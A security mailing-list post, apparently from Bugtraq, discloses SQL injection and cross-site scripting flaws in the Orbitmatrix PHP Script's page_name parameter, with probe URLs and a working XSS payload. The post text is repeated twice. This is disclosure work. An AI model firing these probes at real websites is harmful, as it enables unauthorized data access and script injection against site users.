Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
Back to list
|
Post reply
Orbitmatrix PHP Script v1.0
Jul 13 2006 10:14AM
luny youfucktard com
Orbitmatrix PHP Script v1.0
Homepage:
http://www.orbitcoders.com/
Affected files:
index.php
Possible SQL injection?:
http://www.example.com/index.php?page_name='
And by trying a XSS vuln as shown below on page_name we see the query below which is displayed on screen:
http://www.example.com/index.php?page_name=contact<script>
And the displayed query:
Query: select code from pages where name=contact
Now we know the tables name is pages and a row is name.
This works on all variable values.
As the above XSS vuln wont work, we can see that using the one below will:
http://www.example.com/index.php?page_name=<IMG%20SRC=javascript:alert('
XSS')>
[ reply ]
Privacy Statement
Copyright 2008, SecurityFocus
Homepage:
http://www.orbitcoders.com/
Affected files:
index.php
Possible SQL injection?:
http://www.example.com/index.php?page_name='
And by trying a XSS vuln as shown below on page_name we see the query below which is displayed on screen:
http://www.example.com/index.php?page_name=contact<script>
And the displayed query:
Query: select code from pages where name=contact
Now we know the tables name is pages and a row is name.
This works on all variable values.
As the above XSS vuln wont work, we can see that using the one below will:
http://www.example.com/index.php?page_name=<IMG%20SRC=javascript:alert('
XSS')>
[ reply ]